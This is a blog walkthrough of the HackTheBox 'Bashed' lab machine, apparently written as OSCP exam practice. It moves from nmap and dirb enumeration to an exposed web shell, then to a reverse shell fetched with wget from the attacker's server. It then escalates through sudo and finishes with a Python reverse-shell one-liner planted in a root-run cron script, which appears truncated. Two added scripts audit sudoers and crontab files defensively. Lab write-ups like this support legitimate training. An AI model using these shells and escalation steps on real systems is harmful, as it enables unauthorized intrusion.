In the name of Allah, the Most Gracious, the Most Merciful. All praise is due to Allah, Lord of the worlds, and peace and blessings be upon the best of creation.
Hi everyone. This is, Insha Allah, a series of write-ups solving the boxes on TJ_Null's list of HTB machines, to help me and anyone else preparing for the OSCP exam.
This is the first write-up, and we will solve the Bashed HackTheBox machine.
1- Network enumeration:
Let's get started with a standard Nmap scan:
nmap -sV -sC 10.129.156.242 -p 80
-sV to determine service/version info
-sC to run the default Nmap scripts
The HTTP port is open:
2- Directory brute force:
Doing a directory brute force to discover hidden directories, using Nmap:
nmap --script=http-enum 10.129.156.242 -p 80
Or using Dirb (the wordlist is a positional argument; dirb's -w flag means "don't stop on warnings", so it must not be placed before the wordlist):
$ dirb http://10.129.155.176/ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Looking in /dev/, we find phpbash.php and phpbash.min.php.
When clicking on phpbash.min.php, we discover that there is an exposed web shell:
logged in as: www-data
There are two users, "arrexel" and "scriptmanager". We can read the flags of the two users, but we cannot read the root user's flag without obtaining root's privileges.
So we need to escalate our privileges to read the root flag, but before that we should enumerate the system to understand it and look for the most likely privilege escalation vector on this Linux system.
If you are not familiar with Linux privilege escalation, you can look at this room from TryHackMe; it's useful, and I learned a lot from it:
Any user can check their current situation regarding root privileges using the sudo -l command.
https://gtfobins.github.io/ is a valuable source that provides information on how any program on which you may have sudo rights can be used.
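The sudo -l check above is what an intruder runs after landing as www-data; the same information is available to the administrator beforehand from the sudoers file. The following POSIX shell script is an added example and is not part of the original write-up or of the box: it reads sudoers-format rules and lists every entry that grants passwordless (NOPASSWD) execution, which is the kind of rule that lets one account switch to another without a password. The sample sudoers content inside it is constructed for demonstration, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up: list every sudoers rule that grants
# passwordless execution. This is the administrator-side counterpart of running
# `sudo -l` as a low-privileged user.
#
# Assumptions (not on the original page): rules use the common one-line form
#   user_or_%group  HOST=(runas[:group]) [TAG:] commands
# Aliases, Defaults and comments are skipped; the sample content below is constructed.

# sample_sudoers -> prints a constructed sudoers file for demonstration.
sample_sudoers() {
    cat <<'EOF'
# constructed sample, not the real /etc/sudoers of the machine
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
www-data        ALL=(scriptmanager : scriptmanager) NOPASSWD: ALL
backup          ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/tar
EOF
}

# audit_sudoers < FILE -> prints "NOPASSWD <who> <runas> <commands>" for each rule that
# can be used without a password; "ALL" in the last field means any command at all.
audit_sudoers() {
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|\#*|Defaults*|*_Alias*) continue ;;
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        who=${line%%[[:space:]]*}
        # The run-as part sits between the first '(' and ')'; sudo defaults to root without it.
        case $line in
            *\(*\)*) runas=${line#*\(}; runas=$(printf '%s' "${runas%%\)*}" | tr -d ' ') ;;
            *) runas=root ;;
        esac
        cmds=$(printf '%s' "${line##*NOPASSWD:}" | sed 's/^[[:space:]]*//')
        printf 'NOPASSWD %s %s %s\n' "$who" "$runas" "$cmds"
    done
}

# Usage: sh audit_sudoers.sh /etc/sudoers   (no argument: audit the constructed sample)
if [ -n "${1:-}" ]; then
    audit_sudoers < "$1"
else
    sample_sudoers | audit_sudoers
fi
```

Run against a real system, point it at /etc/sudoers and the files in /etc/sudoers.d; any line reporting ALL as the command for a service account such as www-data is the finding that turns a web shell into a second user on the box.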
So there are two users whose privileges we can access without a password, but before that we need a PHP reverse shell.
You can download this shell:
Change the port and IP in the shell.
Go to the upload directory, as in the screenshot below.
1- Run a simple Python HTTP server on your machine:
$ python3 -m http.server 12344
2- Upload the shell to the target using wget:
$ wget 10.10.14.63:12344/revers.php
Go to the browser and open the shell file.
And Alhamdulillah, the reverse shell succeeded.
Let's upgrade our shell with a bit of Python:
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@bashed:/$ ls -la
There is a directory named "scripts" that only the "scriptmanager" account has write/execute permissions on, so we need to get that user's privileges using the following command:
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  217 Mar 15 10:49 test.py
-rw-r--r--  1 root          root            12 Mar 15 10:38 test.txt
So there are two files, "test.py" and "test.txt", and when we look at the timestamps we see that "test.txt" was modified a short while ago.
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
scriptmanager@bashed:/scripts$ cat test.txt
So this is the content of the two files: "test.py" opens "test.txt" and writes these words into it.
Since "test.txt" is owned by root and keeps being rewritten, root must be running "test.py" on a schedule, while the file itself belongs to scriptmanager. So we can use this to escalate privileges by putting our Python shell in the "test.py" file; it's like the cron job privilege escalation attack.
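The weakness the write-up exploits here is a scheduled script that root executes but that a lower-privileged account owns and can edit. The POSIX shell script below is an added example, not part of the original write-up or of the box: it reads a system-crontab-format file and flags every scheduled script that is group- or world-writable, or that sits in a group- or world-writable directory, so that a defender can find this condition before it is used. The directory layout and crontab it builds for its demo are constructed to mirror the /scripts situation described above; the function names and the six-field crontab assumption are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a system crontab for scripts
# that a privileged scheduler runs but that group members or other users can modify.
# That is the condition exploited on Bashed: /scripts is group-writable, test.py
# belongs to scriptmanager, and the test.txt it writes ends up owned by root.
#
# Assumptions (not on the original page): the file uses the six-field system-crontab
# layout (minute hour day month weekday user command); any command token containing a
# '/' is treated as a path to check, and redirections (tokens containing '>') are skipped.

# cron_script_paths LINE -> prints each path-like token of the command part, one per line.
cron_script_paths() {
    line=$1
    case $line in
        ''|\#*) return 0 ;;
    esac
    # Fields 1-5 are the schedule and field 6 the user; everything after is the command.
    cmd=$(printf '%s\n' "$line" | awk '{ for (i = 7; i <= NF; i++) printf "%s ", $i; print "" }')
    for tok in $cmd; do
        case $tok in
            *\>*) ;;                    # redirection such as >/dev/null, not a script
            */*) printf '%s\n' "$tok" ;;
        esac
    done
}

# writable_by_others PATH -> succeeds if PATH has the group or other write bit set.
writable_by_others() {
    [ -n "$(find "$1" -prune \( -perm -g+w -o -perm -o+w \) -print 2>/dev/null)" ]
}

# audit_crontab FILE -> prints "RISK <user> <path> <reason>" for every scheduled script
# that someone other than its owner could edit or replace. Always returns 0.
audit_crontab() {
    while IFS= read -r line || [ -n "$line" ]; do
        user=$(printf '%s\n' "$line" | awk '{ print $6 }')
        for path in $(cron_script_paths "$line"); do
            if [ -e "$path" ] && writable_by_others "$path"; then
                printf 'RISK %s %s script-writable-by-group-or-others\n' "$user" "$path"
            elif writable_by_others "$(dirname "$path")"; then
                printf 'RISK %s %s parent-dir-writable-by-group-or-others\n' "$user" "$path"
            fi
        done
    done < "$1"
    return 0
}

# make_sample_tree DIR -> builds a constructed fixture under DIR (not the box's real files):
# a group-writable scripts directory like the one on Bashed, a correctly protected job,
# a job living in a world-writable directory, and a crontab that references all three.
make_sample_tree() {
    base=$1
    mkdir -p "$base/scripts" "$base/safe" "$base/loose"
    chmod 770 "$base/scripts"; chmod 755 "$base/safe"; chmod 777 "$base/loose"
    printf 'f = open("test.txt", "w")\n' > "$base/scripts/test.py"; chmod 664 "$base/scripts/test.py"
    printf '#!/bin/sh\nexit 0\n' > "$base/safe/job.sh";  chmod 755 "$base/safe/job.sh"
    printf '#!/bin/sh\nexit 0\n' > "$base/loose/run.sh"; chmod 755 "$base/loose/run.sh"
    printf '%s\n' \
        '# constructed system crontab (minute hour day month weekday user command)' \
        'SHELL=/bin/sh' \
        "* * * * * root python $base/scripts/test.py" \
        "0 * * * * root $base/safe/job.sh >/dev/null 2>&1" \
        "30 2 * * * backup $base/loose/run.sh" > "$base/crontab"
}

# Usage: sh audit_cron.sh /etc/crontab   (no argument: run against the constructed sample)
if [ -n "${1:-}" ]; then
    audit_crontab "$1"
else
    sample=$(mktemp -d)
    make_sample_tree "$sample"
    audit_crontab "$sample/crontab"
    rm -rf "$sample"
fi
```

On the sample, the scriptmanager-style test.py is reported because the file itself is group-writable, and run.sh is reported because its directory is world-writable even though the file is not; job.sh in a 755 directory is clean. Lines such as @reboot entries or per-user crontabs (which have no user field) are outside the six-field assumption and would need a separate pass.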
So let's follow these steps:
1- Open a new Netcat listener on a different port:
2- Add our Python shell to the "test.py" file:
echo 'import socket,subprocess,os
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ' >test.py
And Alhamdulillah, we got the shell:
Getting the flag from the root directory:
Thank you for reading this write-up; I hope you found it useful.
You can follow me on: